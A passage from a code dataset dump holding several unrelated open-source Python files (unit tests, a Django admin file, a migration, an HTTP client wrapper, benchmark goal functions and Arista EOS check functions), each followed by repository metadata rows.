print("{} metros equivale a {} centimetros e a {} milimetros".format(n, n*100, n*1000))
print("{} metros equivale a {}km, {}hm, {}dam, {}m , {}dm, {}cm, {}mm".format(n, n/1000, n/100, n/10, n, n*10, n*100, n*1000))
| 77.75 | 126 | 0.643087 | 55 | 311 | 3.636364 | 0.527273 | 0.03 | 0.075 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093985 | 0.144695 | 311 | 3 | 127 | 103.666667 | 0.657895 | 0 | 0 | 0 | 0 | 0.333333 | 0.617363 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
be4587c1e665659df70f6a7af6431cf67f55ccf9 | 3,069 | py | Python | tests/integration/cli_guess_test.py | ocefpaf/trailscraper | 1db91df5738f19d022760eda08ef310c73090b57 | [
"Apache-2.0"
] | 497 | 2018-01-08T15:36:05.000Z | 2022-03-30T14:11:54.000Z | tests/integration/cli_guess_test.py | ocefpaf/trailscraper | 1db91df5738f19d022760eda08ef310c73090b57 | [
"Apache-2.0"
] | 97 | 2017-11-26T13:52:20.000Z | 2022-02-07T01:36:10.000Z | tests/integration/cli_guess_test.py | ocefpaf/trailscraper | 1db91df5738f19d022760eda08ef310c73090b57 | [
"Apache-2.0"
] | 26 | 2019-04-04T21:37:29.000Z | 2022-02-18T10:23:07.000Z | from click.testing import CliRunner
from trailscraper import cli
from trailscraper.iam import PolicyDocument, Statement, Action, parse_policy_document
def test_should_guess_all_matching_statements():
    input_policy = PolicyDocument(
        Version="2012-10-17",
        Statement=[
            Statement(
                Effect="Allow",
                Action=[
                    Action('autoscaling', 'DescribeLaunchConfigurations'),
                ],
                Resource=["*"]
            ),
            Statement(
                Effect="Allow",
                Action=[
                    Action('sts', 'AssumeRole'),
                ],
                Resource=[
                    "arn:aws:iam::111111111111:role/someRole"
                ]
            )
        ]
    )
    expected_output = PolicyDocument(
        Version="2012-10-17",
        Statement=[
            Statement(
                Effect="Allow",
                Action=[
                    Action('autoscaling', 'DescribeLaunchConfigurations'),
                ],
                Resource=["*"]
            ),
            Statement(
                Effect="Allow",
                Action=[
                    Action('autoscaling', 'CreateLaunchConfiguration'),
                    Action('autoscaling', 'DeleteLaunchConfiguration'),
                ],
                Resource=["*"]
            ),
            Statement(
                Effect="Allow",
                Action=[
                    Action('sts', 'AssumeRole'),
                ],
                Resource=[
                    "arn:aws:iam::111111111111:role/someRole"
                ]
            )
        ]
    )

    runner = CliRunner()
    result = runner.invoke(cli.root_group, args=["guess"], input=input_policy.to_json())

    assert result.exit_code == 0
    assert parse_policy_document(result.output) == expected_output
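
# The invocation above corresponds roughly to the following shell usage
# (a sketch derived from the CliRunner args; 'policy.json' is a placeholder):
#
#   cat policy.json | trailscraper guess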
def test_should_guess_only_specific_actions_and_fix_upper_lowercase():
    input_policy = PolicyDocument(
        Version="2012-10-17",
        Statement=[
            Statement(
                Effect="Allow",
                Action=[
                    Action('ec2', 'DetachVolume'),
                ],
                Resource=["*"]
            ),
        ]
    )
    expected_output = PolicyDocument(
        Version="2012-10-17",
        Statement=[
            Statement(
                Effect="Allow",
                Action=[
                    Action('ec2', 'DetachVolume'),
                ],
                Resource=["*"]
            ),
            Statement(
                Effect="Allow",
                Action=[
                    Action('ec2', 'AttachVolume'),
                    Action('ec2', 'DescribeVolumes'),
                ],
                Resource=["*"]
            ),
        ]
    )

    runner = CliRunner()
    result = runner.invoke(cli.root_group, args=["guess", "--only", "Attach", "--only", "describe"], input=input_policy.to_json())

    assert result.exit_code == 0
    assert parse_policy_document(result.output) == expected_output
| 29.228571 | 130 | 0.461388 | 211 | 3,069 | 6.549763 | 0.317536 | 0.086831 | 0.115774 | 0.150507 | 0.740955 | 0.740955 | 0.70767 | 0.70767 | 0.70767 | 0.70767 | 0 | 0.035048 | 0.423591 | 3,069 | 104 | 131 | 29.509615 | 0.746184 | 0 | 0 | 0.757895 | 0 | 0 | 0.143043 | 0.059954 | 0 | 0 | 0 | 0 | 0.042105 | 1 | 0.021053 | false | 0 | 0.031579 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be4af15d1c11c92e7956accbe80fa829f9ceb684 | 60 | py | Python | catkin_ws/src/line_detector/include/line_detector/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 12 | 2016-04-14T12:21:46.000Z | 2021-06-18T07:51:40.000Z | catkin_ws/src/line_detector/include/line_detector/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 14 | 2017-03-03T23:33:05.000Z | 2018-04-03T18:07:53.000Z | catkin_ws/src/line_detector/include/line_detector/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 113 | 2016-05-03T06:11:42.000Z | 2019-06-01T14:37:38.000Z | from .line_detector1 import *
from .line_detector2 import *
| 20 | 29 | 0.8 | 8 | 60 | 5.75 | 0.625 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.133333 | 60 | 2 | 30 | 30 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
be4e0a10789c867829ca0032ce6cda224c991103 | 143 | py | Python | feed/admin.py | radekwilk/Sharing-images-app-Django-project | 08773a156344216f9aa62c1bdf23ff18b4ee3725 | [
"MIT"
] | null | null | null | feed/admin.py | radekwilk/Sharing-images-app-Django-project | 08773a156344216f9aa62c1bdf23ff18b4ee3725 | [
"MIT"
] | null | null | null | feed/admin.py | radekwilk/Sharing-images-app-Django-project | 08773a156344216f9aa62c1bdf23ff18b4ee3725 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post
class PostAdmin(admin.ModelAdmin):
    pass
admin.site.register(Post, PostAdmin)
| 14.3 | 36 | 0.776224 | 19 | 143 | 5.842105 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146853 | 143 | 9 | 37 | 15.888889 | 0.909836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
be8a81aadcc411c31f3a4d13bd4f0eaea4f22116 | 2,355 | py | Python | clients/python/tyckiting_client/ai/tests/test_base.py | CarstenWalther/space-tyckiting | 8398f080332c78c7f246289947fdda49558e0f12 | [
"MIT"
] | 1 | 2017-02-04T14:13:44.000Z | 2017-02-04T14:13:44.000Z | clients/python/tyckiting_client/ai/tests/test_base.py | CarstenWalther/space-tyckiting | 8398f080332c78c7f246289947fdda49558e0f12 | [
"MIT"
] | null | null | null | clients/python/tyckiting_client/ai/tests/test_base.py | CarstenWalther/space-tyckiting | 8398f080332c78c7f246289947fdda49558e0f12 | [
"MIT"
] | null | null | null | import unittest
import json
from tyckiting_client.ai import base
from tyckiting_client import messages
class BaseTest(unittest.TestCase):

    def test_getEndangeredBots_bot_sees_but_is_dead(self):
        data = json.loads('[{"event":"move","botId":5,"pos":{"x":2,"y":-4}},{"event":"hit","source":4,"botId":5}, \
            {"event":"damaged","botId":5,"damage":1},{"event":"see","source":5,"botId":0,"pos":{"x":2,"y":-3}}, \
            {"event":"die","botId":5}]')
        events = list(map(lambda e: messages.Event(**e), data or []))
        ai = base.BaseAi(messages.Config())
        endangeredBots = ai.getEndangeredBots(events)
        expectedEndangeredBots = set()
        self.assertEqual(endangeredBots, expectedEndangeredBots)

    def test_getEndangeredBots_bot_detected_but_is_dead(self):
        data = json.loads('[{"event":"move","botId":5,"pos":{"y":12,"x":-10}}, \
            {"event":"damaged","botId":5,"damage":1}, \
            {"event":"radarEcho","pos":{"y":-1,"x":3}}, \
            {"event":"radarEcho","pos":{"y":0,"x":6}}, \
            {"event":"detected","botId":5}, \
            {"event":"die","botId":5}]')
        events = list(map(lambda e: messages.Event(**e), data or []))
        ai = base.BaseAi(messages.Config())
        endangeredBots = ai.getEndangeredBots(events)
        expectedEndangeredBots = set()
        self.assertEqual(endangeredBots, expectedEndangeredBots)

    def test_addIfNotDead_bot_is_dead(self):
        data = json.loads('[{"event":"move","botId":5,"pos":{"x":2,"y":-4}},{"event":"hit","source":4,"botId":5}, \
            {"event":"damaged","botId":5,"damage":1},{"event":"see","source":5,"botId":0,"pos":{"x":2,"y":-3}}, \
            {"event":"die","botId":5}]')
        events = list(map(lambda e: messages.Event(**e), data or []))
        endangeredBots = set()
        ai = base.BaseAi(messages.Config())
        ai.addIfNotDead(endangeredBots, 5, events)
        expectedEndangeredBots = set()
        self.assertEqual(endangeredBots, expectedEndangeredBots)

    # Renamed: this method originally duplicated the name of the method above,
    # which silently shadowed it; unlike that case, the bot here has no "die"
    # event, so it must be added to the endangered set.
    def test_addIfNotDead_bot_is_alive(self):
        data = json.loads('[{"event":"move","botId":5,"pos":{"x":2,"y":-4}},{"event":"hit","source":4,"botId":5}, \
            {"event":"damaged","botId":5,"damage":1},{"event":"see","source":5,"botId":0,"pos":{"x":2,"y":-3}}]')
        events = list(map(lambda e: messages.Event(**e), data or []))
        endangeredBots = set()
        ai = base.BaseAi(messages.Config())
        ai.addIfNotDead(endangeredBots, 5, events)
        expectedEndangeredBots = set([5])
        self.assertEqual(endangeredBots, expectedEndangeredBots) | 46.176471 | 109 | 0.653079 | 311 | 2,355 | 4.874598 | 0.189711 | 0.059367 | 0.019789 | 0.023747 | 0.808707 | 0.808707 | 0.808707 | 0.788918 | 0.788918 | 0.788918 | 0 | 0.023966 | 0.096391 | 2,355 | 51 | 110 | 46.176471 | 0.68844 | 0 | 0 | 0.688889 | 0 | 0.133333 | 0.166384 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 1 | 0.088889 | false | 0 | 0.088889 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
bea1283b747e80a30a83d908022efe53ed89fc85 | 1,623 | py | Python | lib/spack/spack/test/config_values.py | rvinaybharadwaj/spack | 03790a4f3609f1bedb7dee947c8712b0ab1e3348 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2020-10-20T08:57:12.000Z | 2020-10-20T08:57:12.000Z | lib/spack/spack/test/config_values.py | rvinaybharadwaj/spack | 03790a4f3609f1bedb7dee947c8712b0ab1e3348 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | lib/spack/spack/test/config_values.py | rvinaybharadwaj/spack | 03790a4f3609f1bedb7dee947c8712b0ab1e3348 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2020-11-08T10:26:48.000Z | 2020-11-08T10:26:48.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import spack.spec
import spack.store  # referenced below but missing from the original imports


def test_set_install_hash_length(mock_packages, mutable_config, monkeypatch,
                                 tmpdir):
    # spack.store.layout caches initial config values, so we monkeypatch
    mutable_config.set('config:install_hash_length', 5)
    mutable_config.set('config:install_tree', {'root': str(tmpdir)})
    monkeypatch.setattr(spack.store, 'store', spack.store._store())

    spec = spack.spec.Spec('libelf').concretized()
    prefix = spec.prefix
    hash = prefix.rsplit('-')[-1]
    assert len(hash) == 5

    mutable_config.set('config:install_hash_length', 9)
    monkeypatch.setattr(spack.store, 'store', spack.store._store())

    spec = spack.spec.Spec('libelf').concretized()
    prefix = spec.prefix
    hash = prefix.rsplit('-')[-1]
    assert len(hash) == 9


def test_set_install_hash_length_upper_case(mock_packages, mutable_config,
                                            monkeypatch, tmpdir):
    # spack.store.layout caches initial config values, so we monkeypatch
    mutable_config.set('config:install_hash_length', 5)
    mutable_config.set(
        'config:install_tree',
        {'root': str(tmpdir),
         'projections': {'all': '{name}-{HASH}'}}
    )
    monkeypatch.setattr(spack.store, 'store', spack.store._store())

    spec = spack.spec.Spec('libelf').concretized()
    prefix = spec.prefix
    hash = prefix.rsplit('-')[-1]
    assert len(hash) == 5
| 33.8125 | 76 | 0.664818 | 199 | 1,623 | 5.271357 | 0.336683 | 0.076263 | 0.085796 | 0.104862 | 0.807436 | 0.807436 | 0.755958 | 0.71878 | 0.71878 | 0.71878 | 0 | 0.014672 | 0.202095 | 1,623 | 47 | 77 | 34.531915 | 0.795367 | 0.198398 | 0 | 0.551724 | 0 | 0 | 0.144513 | 0.060278 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0.068966 | false | 0 | 0.034483 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bec9463940c433383d3df20353175902f9a5df58 | 4,371 | py | Python | mlbench_core/evaluation/goals.py | c4dt/mlbench-core | 8a5cf6e00ff4535b2aea23b213241858a5ee5f00 | [
"Apache-2.0"
] | null | null | null | mlbench_core/evaluation/goals.py | c4dt/mlbench-core | 8a5cf6e00ff4535b2aea23b213241858a5ee5f00 | [
"Apache-2.0"
] | null | null | null | mlbench_core/evaluation/goals.py | c4dt/mlbench-core | 8a5cf6e00ff4535b2aea23b213241858a5ee5f00 | [
"Apache-2.0"
] | null | null | null | def _add_detailed_times(result, tracker):
compute_time = tracker.get_total_compute_time()
if compute_time:
result += ", Compute: {} seconds".format(compute_time)
communication_time = tracker.get_total_communication_time()
if communication_time:
result += ", Communication: {} seconds".format(communication_time)
return result
def time_to_accuracy_goal(threshold):
def _time_to_accuracy_goal(metric_name, value, tracker):
if metric_name != "val_global_Prec@1":
return None
if value >= threshold:
duration = tracker.get_total_train_time()
result = (
"{0:02d}% Top 1 Validation Accuracy reached in {1:.3f} "
"seconds".format(threshold, duration)
)
result = _add_detailed_times(result, tracker)
return result
return None
return _time_to_accuracy_goal
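
# Example (a sketch): the factory returns a goal function that a metrics loop
# can call on every reported metric; 'tracker' is assumed to be an
# mlbench_core Tracker instance available in that loop:
#
#   goal = time_to_accuracy_goal(80)
#   message = goal('val_global_Prec@1', 80.5, tracker)
#   # -> "80% Top 1 Validation Accuracy reached in ... seconds", else None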
def task1_time_to_accuracy_goal():
    """ Accuracy over Time target for benchmark task 1: Image classification
    Target is 80% accuracy
    Return:
        func: time_time_to_accuracy_goal with threshold = 80
    """
    return time_to_accuracy_goal(80)


def task1_time_to_accuracy_light_goal():
    """ Accuracy over Time target for benchmark task 1: Image classification
    (Light)
    Light target is 70% accuracy
    Return:
        func: time_time_to_accuracy_goal with threshold = 70
    """
    return time_to_accuracy_goal(70)


def task2_time_to_accuracy_goal():
    """Time to accuracy goal for benchmark task 2: Linear binary classifier
    Target is an accuracy of 89%
    Return:
        func: time_time_to_accuracy_goal with threshold = 89
    """
    return time_to_accuracy_goal(89)


def task2_time_to_accuracy_light_goal():
    """Time to perplexity goal for benchmark task 2: Linear binary classifier
    Target is an accuracy of 80%
    Return:
        func: time_time_to_accuracy_goal with threshold = 80
    """
    return time_to_accuracy_goal(80)


def task3_time_to_preplexity_goal(metric_name, value, tracker):
    """Time to perplexity goal for benchmark task 3: Language Modelling
    Target is a perplexity of 50
    Args:
        metric_name(str): Name of the metric to test the value for,
            only "val_Prec@1" is counted
        value (float): Metric value to check
        tracker (`obj`:mlbench_core.utils.tracker.Tracker): Tracker object
            used for the current run
    Return:
        result (str) or `None` if target is not reached
    """
    if metric_name != "val_global_Perplexity":
        return None
    if value <= 50:
        duration = tracker.get_total_train_time()
        result = "Validation perplexity of 50 reached in {0:.3f} seconds".format(
            duration
        )
        result = _add_detailed_times(result, tracker)
        return result
    return None
def task3_time_to_preplexity_light_goal(metric_name, value, tracker):
    """Time to perplexity goal for benchmark task 3: Language Modelling (Light)
    Target is a perplexity of 100 (the light threshold checked below)
    Args:
        metric_name(str): Name of the metric to test the value for,
            only "val_Prec@1" is counted
        value (float): Metric value to check
        tracker (`obj`:mlbench_core.utils.tracker.Tracker): Tracker object
            used for the current run
    Return:
        result (str) or `None` if target is not reached
    """
    if metric_name != "val_global_Perplexity":
        return None
    if value <= 100:
        duration = tracker.get_total_train_time()
        result = "Validation perplexity of 100 reached in {0:.3f} seconds".format(
            duration
        )
        result = _add_detailed_times(result, tracker)
        return result
    return None
def task4_time_to_bleu_goal(threshold=24):
    """Time to BLEU-score goal for benchmark task 4: GNMT machine translation"""
    def _time_to_bleu_goal(metric_name, value, tracker):
        if metric_name != "val_global_BLEU-Score":
            return None
        if value >= threshold:
            duration = tracker.get_total_train_time()
            result = "Validation BLEU-Score of {0} reached in {1:.3f} seconds".format(
                threshold, duration
            )
            result = _add_detailed_times(result, tracker)
            return result
        return None
    return _time_to_bleu_goal
| 26.815951 | 86 | 0.658888 | 562 | 4,371 | 4.877224 | 0.16548 | 0.054725 | 0.081722 | 0.091937 | 0.832543 | 0.734768 | 0.734768 | 0.728931 | 0.725283 | 0.708865 | 0 | 0.021563 | 0.267902 | 4,371 | 162 | 87 | 26.981481 | 0.835 | 0.350949 | 0 | 0.476923 | 0 | 0 | 0.133081 | 0.023819 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169231 | false | 0 | 0 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fe35cd3633359bc57342fe8713175b4b6658b151 | 967 | py | Python | zerver/migrations/0385_attachment_flags_cache.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 4 | 2021-09-16T16:46:55.000Z | 2022-02-06T13:00:21.000Z | zerver/migrations/0385_attachment_flags_cache.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | null | null | null | zerver/migrations/0385_attachment_flags_cache.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 1 | 2022-01-15T08:36:09.000Z | 2022-01-15T08:36:09.000Z | # Generated by Django 3.2.12 on 2022-03-23 03:49
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ("zerver", "0384_alter_realm_not_null"),
    ]

    operations = [
        migrations.AlterField(
            model_name="archivedattachment",
            name="is_realm_public",
            field=models.BooleanField(default=False, null=True),
        ),
        migrations.AlterField(
            model_name="archivedattachment",
            name="is_web_public",
            field=models.BooleanField(default=False, null=True),
        ),
        migrations.AlterField(
            model_name="attachment",
            name="is_realm_public",
            field=models.BooleanField(default=False, null=True),
        ),
        migrations.AlterField(
            model_name="attachment",
            name="is_web_public",
            field=models.BooleanField(default=False, null=True),
        ),
    ]
| 28.441176 | 64 | 0.594623 | 94 | 967 | 5.946809 | 0.414894 | 0.143113 | 0.178891 | 0.207513 | 0.729875 | 0.729875 | 0.729875 | 0.613596 | 0.613596 | 0.613596 | 0 | 0.029369 | 0.29576 | 967 | 33 | 65 | 29.30303 | 0.791483 | 0.04757 | 0 | 0.740741 | 1 | 0 | 0.155604 | 0.027203 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fe816f458a497f67cbbfb5062e5998e2a40011d2 | 3,032 | py | Python | sparrow_cloud/restclient/requests_client.py | ArcturusMensk/sparrow_cloud | 0ae75716de23b97366c2e2ac6c08e9850291c95d | [
"MIT"
] | null | null | null | sparrow_cloud/restclient/requests_client.py | ArcturusMensk/sparrow_cloud | 0ae75716de23b97366c2e2ac6c08e9850291c95d | [
"MIT"
] | null | null | null | sparrow_cloud/restclient/requests_client.py | ArcturusMensk/sparrow_cloud | 0ae75716de23b97366c2e2ac6c08e9850291c95d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
requests 的封装, 返回的原生数据
"""
import requests
from requests.exceptions import ConnectTimeout, ConnectionError
from sparrow_cloud.registry.service_discovery import consul_service
def get(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
"""
service_conf: 服务配置
:param service_conf:
:param api_path:
:param args:
:param kwargs:
:return:
"""
error_message = None
for _ in range(int(retry_times)):
try:
url = _build_url(service_conf, api_path)
res = requests.get(url, timeout=timeout, *args, **kwargs)
return res
except (ConnectionError, ConnectTimeout)as ex:
error_message = ex.__str__()
raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))
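
# Example (a sketch; 'MY_SERVICE' is a placeholder service-registry key and
# the path/params are illustrative — extra kwargs are passed to requests.get):
#
#   response = get('MY_SERVICE', '/api/v1/users/', params={'page': 1})
#   if response.status_code == 200:
#       data = response.json()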
def post(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
    """
    service_conf: the service-registry key configured in settings
    :param service_conf:
    :param api_path:
    :param args:
    :param kwargs:
    :return:
    """
    error_message = None
    for _ in range(int(retry_times)):
        try:
            url = _build_url(service_conf, api_path)
            res = requests.post(url, timeout=timeout, *args, **kwargs)
            return res
        except (ConnectionError, ConnectTimeout) as ex:
            error_message = ex.__str__()
    raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))


def put(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
    """
    :param service_conf: the service-registry key configured in settings
    :param api_path:
    :param timeout:
    :param args:
    :param kwargs:
    :return:
    """
    error_message = None
    for _ in range(int(retry_times)):
        try:
            url = _build_url(service_conf, api_path)
            res = requests.put(url, timeout=timeout, *args, **kwargs)
            return res
        except (ConnectionError, ConnectTimeout) as ex:
            error_message = ex.__str__()
    raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))


def delete(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
    """
    :param service_conf: the service-registry key configured in settings
    :param api_path:
    :param timeout:
    :param args:
    :param kwargs:
    :return:
    """
    error_message = None
    for _ in range(int(retry_times)):
        try:
            url = _build_url(service_conf, api_path)
            res = requests.delete(url, timeout=timeout, *args, **kwargs)
            return res
        except (ConnectionError, ConnectTimeout) as ex:
            error_message = ex.__str__()
    raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))


def _build_url(service_conf, api_path):
    """
    :param service_conf:
    :param api_path:
    :return:
    """
    servicer_addr = consul_service(service_conf)
    return "http://{}{}".format(servicer_addr, api_path) | 30.019802 | 102 | 0.638852 | 363 | 3,032 | 5.060606 | 0.168044 | 0.087643 | 0.06859 | 0.088187 | 0.850844 | 0.850844 | 0.821448 | 0.810016 | 0.810016 | 0.810016 | 0 | 0.003922 | 0.243074 | 3,032 | 101 | 103 | 30.019802 | 0.796514 | 0.175132 | 0 | 0.695652 | 0 | 0 | 0.085444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.065217 | 0 | 0.282609 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
fea5540868f718ca381a21ee2a75f07d7c04de4c | 54,487 | py | Python | tests_eos/functions.py | arista-netdevops-community/network_tests_automation | feb216799e427cde82bd7594d2276e0e6ef5f9b1 | [
"Apache-2.0"
] | 4 | 2022-02-07T16:54:13.000Z | 2022-03-02T02:22:06.000Z | tests_eos/functions.py | arista-netdevops-community/network_tests_automation | feb216799e427cde82bd7594d2276e0e6ef5f9b1 | [
"Apache-2.0"
] | 10 | 2022-02-10T11:31:49.000Z | 2022-03-03T16:31:49.000Z | tests_eos/functions.py | arista-netdevops-community/network_tests_automation | feb216799e427cde82bd7594d2276e0e6ef5f9b1 | [
"Apache-2.0"
] | 3 | 2022-02-08T07:58:35.000Z | 2022-03-28T20:36:49.000Z | """
Module that defines various functions to test EOS devices.
"""
from jsonrpclib import jsonrpc
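
# All functions below share the same calling convention. A minimal sketch,
# assuming eAPI is enabled on the switch (host and credentials are
# placeholders):
#
#   from jsonrpclib import Server
#   device = Server('https://%s:%s@%s/command-api'
#                   % ('admin', 'password', '10.0.0.1'))
#   result = verify_eos_version(device, 'enable_password', versions=['4.25.4M'])
#   # result is True, False, or None when the check could not be run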
def verify_eos_version(device, enable_password, versions = None):
    """
    Verifies the device is running one of the allowed EOS version.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
        versions (list): List of allowed EOS versions.
    Returns:
        bool: `True` if the device is running an allowed EOS version.
        `False` otherwise.
    """
    if not versions:
        return None
    try:
        response = device.runCmds(1, ['show version'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['version'] in versions:
            return True
        return False
    except KeyError:
        return None


def verify_terminattr_version(device, enable_password, versions = None):
    """
    Verifies the device is running one of the allowed TerminAttr version.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
        versions (list): List of allowed TerminAttr versions.
    Returns:
        bool: `True` if the device is running an allowed TerminAttr version. `False` otherwise.
    """
    if not versions:
        return None
    try:
        response = device.runCmds(1, ['show version detail'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['details']['packages']['TerminAttr-core']['version'] in versions:
            return True
        return False
    except KeyError:
        return None


def verify_eos_extensions(device, enable_password):
    """
    Verifies all EOS extensions installed on the device are enabled for boot persistence.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device has all installed its EOS extensions enabled for boot persistence.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show extensions', 'show boot-extensions'], 'json')
    except jsonrpc.AppError:
        return None
    installed_extensions = []
    boot_extensions = []
    try:
        for extension in response[0]['extensions']:
            if response[0]['extensions'][extension]['status'] == 'installed':
                installed_extensions.append(extension)
        for extension in response[1]['extensions']:
            extension = extension.strip('\n')
            if extension == '':
                pass
            else:
                boot_extensions.append(extension)
        installed_extensions.sort()
        boot_extensions.sort()
        if installed_extensions == boot_extensions:
            return True
        return False
    except KeyError:
        return None


def verify_field_notice_44_resolution(device, enable_password):
    """
    Verifies the device is using an Aboot version that fix the bug discussed
    in the field notice 44 (Aboot manages system settings prior to EOS initialization).
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device is using an Aboot version that fix the bug discussed
        in the field notice 44 or if the device model is not affected.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show version detail'], 'json')
    except jsonrpc.AppError:
        return None
    devices = ['DCS-7010T-48',
               'DCS-7010T-48-DC',
               'DCS-7050TX-48',
               'DCS-7050TX-64',
               'DCS-7050TX-72',
               'DCS-7050TX-72Q',
               'DCS-7050TX-96',
               'DCS-7050TX2-128',
               'DCS-7050SX-64',
